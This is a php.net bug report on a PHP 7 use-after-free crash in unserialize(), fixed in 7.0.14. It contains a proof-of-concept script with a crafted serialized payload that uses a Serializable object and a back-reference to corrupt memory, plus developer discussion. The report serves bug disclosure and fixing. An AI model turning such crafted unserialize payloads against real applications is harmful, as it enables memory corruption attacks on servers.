php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #70767 crash after script execution
Submitted: 2015-10-22 12:01 UTC Modified: 2017-01-01 12:01 UTC
Votes:2
Avg. Score:4.0 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: liska at avast dot com Assigned: nikic (profile)
Status: Closed Package: Reproducible crash
PHP Version: 7.0.1 OS: windows 7 64-bit
Private report: No CVE-ID: None
View Developer Edit
 [2015-10-22 12:01 UTC] liska at avast dot com 
Description:
------------
First PoC script from #70172 causes segfault in the middle of the dump. I'm using php-7.0.0RC5-Win32-VC14-x64 thread safe.

Test script:
---------------
class obj implements Serializable
{
    private $data;

    public function serialize()
    {
        return serialize($this->data);
    }

    public function unserialize($data)
    {
        $this->data = unserialize($data);
        $this->data = 1;
    }
}

$inner = 'a:0:{}';
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}';

$data = unserialize($exploit);

for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi' . $i;
}

var_dump($data);

Expected result:
----------------
produced by PHP 5.6.14 that contains fix to #70172

array(2) {
  [0]=>
  object(obj)#1 (1) {
    ["data":"obj":private]=>
    int(1)
  }
  [1]=>
  array(0) {
  }
}


Actual result:
--------------
array(2) {
  [0]=>
  Segmentation fault

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-10-22 13:18 UTC] laruence@php.net
-Status: Open +Status: Analyzed
 [2015-10-22 13:18 UTC] laruence@php.net 
confirm this , but I don't see a easy way to fix it. the problem is, we are not using zval ** anymore.. :<
 [2015-10-23 01:22 UTC] ryat@php.net 
These security patches are not merged yet to master/7.0
http://news.php.net/php.internals/87998
 [2015-10-23 08:48 UTC] laruence@php.net
-Assigned To: +Assigned To: laruence
 [2015-10-23 08:48 UTC] laruence@php.net 
maybe the 5.6 behaviors wrongly , https://3v4l.org/new

reference to a internal (external) object is not allowed.
 [2015-10-23 08:49 UTC] laruence@php.net 
should be: https://3v4l.org/GcebX
 [2015-10-23 09:23 UTC] laruence@php.net
-Assigned To: laruence +Assigned To: stas
 [2015-10-23 09:23 UTC] laruence@php.net 
@stas what do you think ?  since you have been working on serialize issues for some times
 [2015-10-23 23:18 UTC] ryat@php.net 
@laruence reference in Serializable object is allowed. and 5.x branchs is right. 

you can see these: https://3v4l.org/HTQUL https://3v4l.org/JvrVs

you script has triggered UAF/memory corruption in php7.x, so the result is strange.
 [2015-12-31 23:56 UTC] stas@php.net
-PHP Version: 7.0.0RC5 +PHP Version: 7.0.1 -Assigned To: stas +Assigned To:
 [2015-12-31 23:56 UTC] stas@php.net 
Still reproduces on 7.x, but not sure what is the cause yet. The references are allowed in serialized objects, but it's true you can mess things up if you do them maliciously. Not sure yet how to fix it.
 [2017-01-01 12:01 UTC] nikic@php.net
-Status: Analyzed +Status: Closed -Assigned To: +Assigned To: nikic
 [2017-01-01 12:01 UTC] nikic@php.net 
This has been fixed in 7.0.14 by https://github.com/php/php-src/commit/b2af4e8868726a040234de113436c6e4f6372d17.
 [2017-01-01 12:12 UTC] nikic@php.net 
Related To: Bug #65591
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved. 		Last updated: Fri Oct 24 07:00:01 2025 UTC